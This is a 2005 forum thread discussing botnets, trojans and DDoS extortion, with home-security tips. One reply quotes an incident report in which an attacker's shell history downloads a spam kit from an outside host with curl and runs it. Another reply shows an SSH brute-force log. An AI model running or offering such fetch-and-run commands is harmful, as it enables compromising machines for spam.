Herding Zombies
October 7, 2005 11:03 AM   Subscribe

"Extortionists often prefer to target online industries, such as pornography and gambling, that occupy a gray area, and may be reluctant to seek help from law enforcement."

'cause you can't con an honest man....
posted by dersins at 11:05 AM on October 7, 2005

Heh, a 'zombie' is a person's PC which has been infected with a trojan. You can think of a trojen as being like a piece of spyware, except rather then a money hungry corporation exploiting your computer, it's a money hungry Hacker.

Now, the person can keep using their computer while all of this is going on, just like they can with spyware. Other then a little slowdown, they'll never notice anything is wrong.

The trojan programs make an internet connection to the an IRC channel, and listen for commands from the person who installed them.

So a botnet is basically a cluster of PCs that have been taken over.
posted by delmoi at 11:17 AM on October 7, 2005

Legacy of:

a) The internet was superbly designed to network a trusted set of military and university computers in a reliably distributed way so that if part of it were destroyed the remainder could keep working.

b) From day one and for a long while after, Windows was designed to run standalone home computers and was never redeveloped from the ground up when networking came along, they simply grafted communications capability onto what they already had and everybody plugged 'em in.

Put these two radically different design approaches together and you get today's situation.
posted by scheptech at 11:38 AM on October 7, 2005

Interesting and informative.

(Though it sort of makes me feel icky--I could be typing on one of the Living Dead and not even know it.)
posted by leftcoastbob at 11:38 AM on October 7, 2005

Isn't DDOSing porn and gambling kind of ridiculous? Porn and gambling has pretty much devoid of identity, and any pornster worth his salt probably has a slew of different sites and domains. It's different from, say, targeting Adobe strike that, they have law enforcement on their side a shareware author, who relies on branding or a name made for himself.
posted by rolypolyman at 11:41 AM on October 7, 2005

One recent study found that a new P.C., attached to the Internet without protective software, will on average be infected in about twenty minutes.

Unbelievable... and scary. I just "rescued" a friend's computer that had zip for security and was trojan'd with a nasty nasty. It took me almost 6 hours just to find a removal program the trojan didn't recognize so I could kill it. It kept killing everything, or telling Windows the executables were actually images. I've never seen anything like it - and now I hope to never see anything worse. *shudder*
posted by muckalucka at 11:41 AM on October 7, 2005

Personally, I appreciate the irony of people who use Windows machines because everyone else uses Windows machines having their computers turned into slaves.

Until it happens to my wife's box and I have to spend all weekend cleaning the damned thing off.

And, nice breakdown, scheptech. I hadn't seen it written out that way and it really does make perfect sense.
posted by fenriq at 11:41 AM on October 7, 2005

Another account here (via slashdot)
posted by eddydamascene at 11:42 AM on October 7, 2005

I work in the field of computer security, which is to say, I am paid to try and prevent things like DoS attacks from happening to my clients. Allow me to humbly submit several points of interest:

• delmoi nicely explained what a bot is. Your system can be infected with this software through a variety of means, including but not limited to, email attachments, web downloads, or through the direct explotation of a vulnerability in your operating system.


• Microsoft Windows XP is the preferred target these days. Did you know that the average life expectancy of a Windows XP computer on the Internet is 12 minutes? That means that in less time then it takes you to download the latest fixes and patches, your computer can be found and taken over by a malicious program.


• Denial of Service attacks are typically halted by identifying and blocking all of the IP addresses used in the attack. This is to say, that after the attack is halted, the zombied systems used in that attack are now worthless to the attacker, since they have all been blocked. Moreover, a good response will often include notifying the service providers and owners of those zombied systems, so that they might be repaired and un-zombified. This all adds up to the attacker losing the services of the computers he chooses to launch against a target.


• It is not uncommon to see upwards of 10,000 to 100,000 zombied computers being used in a single DDoS attack. Put a different way, the average attacker has such a large pool of available zombified systems at his disposal that he has no problem with throwing away several tens of thousands of them in a single attack. This clearly points to the fact that the available pool of compromised systems must number in the millions, something that I believe is indeed the case.

Since the broadband explosion, with the ever-increasing number of people switching from dial-up to cable and DSL, the number of infected computers has skyrocketed. Several years ago, on my servers, I used to see an average of three or four intrusion attempts per week; these days, I am seeing several dozen per day. Given this meteoric rise in online attacks, it is little wonder that the time-honored element of extortion is being combined with DoS attacks. Any company with sufficient funds and visibility is at risk; not just those who engage is so-called "gray area" activities. Large companies, including banks and telecommunication carriers, have been hit.
posted by nlindstrom at 11:49 AM on October 7, 2005

Did you know that the average life expectancy of a Windows XP computer on the Internet is 12 minutes? That means that in less time then it takes you to download the latest fixes and patches, your computer can be found and taken over by a malicious program.

Yep. Always, always conduct your Windows XP installation behind a router or other firewall of some kind. Windows XP (the original, prior to SP1 and SP2) shipped with a massive remote hole in the default installation in the Universal Plug and Play service allowing anyone to take over a fresh Windows XP install almost instantly.

Denial of Service attacks are typically halted by identifying and blocking all of the IP addresses used in the attack.

The problem is that even if your ISP does block inbound syn packets and the like, large-scale attacks will simply take out most ISPs (or the local branch thereof) altogether.

Good summary, though.
posted by Ryvar at 11:56 AM on October 7, 2005

Via Macintouch (which, as far as I know, doesn't provide a way to link to archives):

Much to my horror, I awoke on the weekend to an e-mail from my service provider which started with:

"Recently we have had complaints of spam coming from your connection."

My wife had complained last week that the computer at home had seemed a bit slow. I rebooted it, and it seemed fine immediately afterwards.
Now I took immediate action, sent an email indicating it was unintentional and I'd take care of it immediately. I pulled the network cable and proceeded to see what had happened.
In a nutshell, about a year ago I'd played around with fast user switching. I'd created an account with the userid of "lisa" and a password of "lisa". Ok, not too swift, but it was convenient for a test. I'd forgotten about it. When I looked in the account's .bash_history file, I found stuff like:

...
curl -O haq.sytes.net/sex.zip
ls
unzip sex.zip
rm -rf sex.zip
cd sex
ls
pico users
chmod +x sendeb.pl
./sendeb.pl
passwd
...

So clearly the person had logged into this not secure, yet still non-admin account and was running scripts. Likely they had gotten in via ssh, since I had the port open so I could do remote maintenance from my office if the need arose.
Checking the /var/log/mail.log (one of the archives), I found that on October 30th it had sent out over 500,000 eBay spam messages.
Just a warning .... make sure you use secure/difficult to guess passwords. ie: Don't use "guest, guest", or name name userid/password pairs.
Mac OS X is very secure, but not if you leave the doors unlocked and the keys in the ignition.

posted by alms at 12:13 PM on October 7, 2005

That last "exploit", alms, affects any host running SSH (whether Mac OS X or Linux or Solaris etc.). Brute-force code has been available for awhile now that automates scanning SSHds for weak username and password combinations.

I wouldn't even patch Win XP behind a firewall. We keep the thing disconnected from the net and use XP + SP 2 patch discs to prep machines. Firewalls will give you a false sense of security if your other machines behind the firewall are compromised to begin with. This problem is exacerbated by laptops that are frequently moved outside and inside firewalled zones.
posted by Rothko at 12:50 PM on October 7, 2005

alms, that has nothing to do with zombies or DDoS attacks; it was just some spammer interactively logging onto an account with a easily-guessed password and running a script.
posted by nicwolff at 12:58 PM on October 7, 2005

Rothko is right. For example, this is taken from just last night, from a single computer:

Failed SSHD logins from:
aaron/password from 192.168.0.0: 3 Time(s)
abigail/password from 192.168.0.0: 3 Time(s)
adam/password from 192.168.0.0: 3 Time(s)
adam/password from 10.0.0.0: 3 Time(s)
admin/password from 10.0.0.0: 21 Time(s)
adrian/password from 192.168.0.0: 3 Time(s)
adriana/password from 192.168.0.0: 3 Time(s)
alan/password from 10.0.0.0: 3 Time(s)
alejandra/password from 192.168.0.0: 3 Time(s)
alejandro/password from 192.168.0.0: 3 Time(s)
alex/password from 192.168.0.0: 3 Time(s)
alex/password from 10.0.0.0: 3 Time(s)
alexa/password from 192.168.0.0: 3 Time(s)
alexander/password from 192.168.0.0: 3 Time(s)
alexandra/password from 192.168.0.0: 3 Time(s)
backup/password from 10.0.0.0: 3 Time(s)
bad/password from 192.168.0.0: 9 Time(s)
banazir/password from 192.168.0.0: 3 Time(s)
barkha/password from 192.168.0.0: 3 Time(s)
benjamin/password from 192.168.0.0: 3 Time(s)
blake/password from 192.168.0.0: 3 Time(s)
bradley/password from 192.168.0.0: 3 Time(s)
brady/password from 192.168.0.0: 3 Time(s)
brendan/password from 192.168.0.0: 3 Time(s)
brett/password from 192.168.0.0: 3 Time(s)

...and over 1,000 more lines like the above, A through Z. Just another typical brute-force dictionary attack.
(The IP addresses have been changed for obvious reasons.)
posted by nlindstrom at 12:59 PM on October 7, 2005

I'm primarily a Mac user, but reading this article got me thinking abolut my sister's XP laptop, which is behind her router's firewall but is otherwise ripe for the pickings. Are any of the commercially available anti-virus/malware applications worth a damn? I realize this isn't the best forum to ask for this advice, but, well, it does seem to be on topic :-)
posted by mosk at 1:10 PM on October 7, 2005

I remember taking part in the SETI program about five or more years back to let SETI use my computer to analyze radio telescope data when I wasn't using it. I know I read that tens of thousands of people were taking part.

Weren't we all willing zombies?
posted by notmtwain at 2:24 PM on October 7, 2005

mosk, I'd recommend installing and running:

1. Spybot - Search & Destroy to remove and block spyware and adware


2. AVG Free Edition anti-virus software to detect and block viruses, worms, and Trojans

If your sister already has anti-virus software installed on her computer, then don't install AVG.* Make sure it is up-to-date, and that its ability to automatically update is working. Most anti-virus software failures can be attributed to the virus definitions database being out of date. Also, never install two anti-virus packages, as they will typically lay waste to your computer while they war over who has control.

* - Unless the anti-virus software is McAfee. In which case, you would do well to uninstall it, reboot, and install AVG. McAfee is about as effective against viruses as a baseball bat is against a tank.
posted by nlindstrom at 2:31 PM on October 7, 2005

nlindstrom -- Many thanks!
posted by mosk at 2:38 PM on October 7, 2005

i'm sort of puzzled why i've had so few problems -- i'm running XP sp1 still. i used zonealarm for awhile but then it became incompatible with azureus, so i stopped using it. the XP firewall is off as well.

i run ad-aware and spybot all the time (i have ad-aware pro) and have never turned up more than bad cookies. the computer runs fine, is never slow, and has never shown any obvious signs of problems.

internet connection is via a motorola cable modem. is it possible that i'm zombie'd without knowing it?
posted by Hat Maui at 2:54 PM on October 7, 2005

There is a whole subculture there. It is very underground because they talk to each other almost exclusivly on IRC. There are gangs of them and their most common target for DOSing is each other. You get cred for being able to knock your opponent off the internet. Most of them are not real hackers but are 'script kiddies' who download programs that automatically do the exploits.

This has been going on for years but it is in the news now because it's only been recently that the Russian mafia has started to tap these kids to do the legwork for these extortion schemes.

The Internet Storm Center will keep you up to date on the latest botnets.
posted by Mr T at 3:05 PM on October 7, 2005

McAfee is about as effective against viruses as a baseball bat is against a tank.

Can you quantify this? I ran McAfee for a bit, but have since moved on -- but I'm still curious.

is it possible that i'm zombie'd without knowing it?

Oh yes, yes it is. Very much so.
posted by davejay at 3:20 PM on October 7, 2005

I don't see why the author described porn and gambling as existing in a "gray area." Many of these companies are publicly traded on european exchanges.

I'd guess they're targetted because they:
-have money
-don't have widely distributed servers (regulatory issues)
-are in highly competitive markets
posted by I Love Tacos at 3:35 PM on October 7, 2005

They're also targeted because web traffic constitutes the majority of their business, and by blocking a website you keep them from earning any money, moreso than for a company that uses the website as an advertisement.
posted by mert at 4:38 PM on October 7, 2005

is it possible that i'm zombie'd without knowing it?

Oh yes, yes it is. Very much so.

Any good information for detecting zombification?

I every now and then get avg telling me I am sending messages via smtp when I don't even use a pop client at all. Near as I can tell a p2p app is having the traffic misidentified by avg but I am not certain.

Neither AVG or any of the anti spyware apps find anything.
Netstat -b while it is occuring doesn't show anything out of the ordinary either.

Are there any other places in XP I can look for troubleshooting? Log files of some sort?
posted by srboisvert at 4:56 PM on October 7, 2005

Hat Maui: I second davejay. There's a very strong possibility that you've got something. Try closing every program that could possibly have a reason to use the Internet, waiting five minutes, then opening a command-line window (Start > Run... > command) and entering netstat -a at the prompt. If you've still got active connections, that's a bad sign.

You should definitely install some kind of firewall (a lot of routers also serve as firewalls) immediately. ZoneAlarm 5.5 and later works fine with Azureus. I can attest to that personally. Perhaps you're referring to the NAT errors? I still get them, whether I have ZoneAlarm running or not (I checked that back when I first got Azureus, but I didn't leave ZoneAlarm off for long — read the firewall logs after having it up for a few days and you won't want to either).
posted by skoosh at 5:08 PM on October 7, 2005

i used zonealarm for awhile but then it became incompatible with azureus, so i stopped using it. the XP firewall is off as well.

That's hilarious. "My security conflicted with my ability to pirate movies on P2P, so I got rid of my security." You, my friend, are why it is so damn easy. Tell you what, I got a file right here called "Angelina.Jolie.sextape.REAL.noPW.DviX.avi", and with my 733+zor new codec, its only 24K! wanna download it?
posted by ChasFile at 5:24 PM on October 7, 2005

is being that much of a dick really necessary?
posted by Hat Maui at 5:50 PM on October 7, 2005

oh, and thanks to people like skoosh who would rather help than mock.
posted by Hat Maui at 5:51 PM on October 7, 2005

Interestingly, both David Weinberger and Rui Carmo are reporting attacks that sound like they're coming from botnets.
posted by tommasz at 5:54 PM on October 7, 2005

Hat Maui, this fearmongering is likely overblown. Do the tests, but know that I'm in precisely the same position as you, except that I use the firewall built into my router. I've been running in this state for years, and I've never once had a virus or trojan, and I've never been inspected by spyware that I can recall.

Most computer problems of this nature can be avoided by 1) not using IE, 2) installing a basic firewall and locking down ports which you don't use, 3) watching which programs you install, and 4) not opening email attachments or running programs that look suspicious. (When in doubt, InCtrl is your friend). It's mostly common sense.
posted by gd779 at 8:43 PM on October 7, 2005

I shut off 3-7 students a day at a university who clicked a pictures.pif link in AIM, and became infected. We use tools like snort and ngrep to find them phoning home to the control server.
Interesting points: virus scanners almost never find these, they are not widely distributed enough. Many hide themselves from being visible on the infected system (this is called a root kit)

In addition to ddos, they use them for spam, phishing, and evading bans.
posted by rubin at 9:06 PM on October 7, 2005

Yup, this has happened to me, I thought my router might be acting up so I tried hooking my pc directly to my cable modem to isolate the problem. Within minutes I had a virus, wouldn't have noticed it if I hadn't had a bandwidth meter program running. Ran netstat and it showed a lot of connections to some irc servers. Found the offending program using Task Manager, stopped it and deleted it (after sending a copy to an anti-virus company).

Now if a virus or trojan could hide itself from both netstat and Task Manager, and only run when I'm downloading stuff, I'd probably would never know about it.
posted by bobo123 at 9:43 PM on October 7, 2005

so i did what skoosh recommended and there was no trouble whatsoever.

i guess that was the reason for my question. contrary to chasfile's ill-informed opinion, i'm no net rookie and by using common sense, as gd779 has suggested, i've avoided trouble, it seems.

so my question is why wasn't i subject to attacks? is it because a cable modem acts as a router and therefore as a firewall, or what?
posted by Hat Maui at 11:30 PM on October 7, 2005

I read the article last night and it seemed... familiar to me, somehow. Has this article or a similar account appeared anywhere, or am I losing my mind?
posted by docgonzo at 7:50 AM on October 8, 2005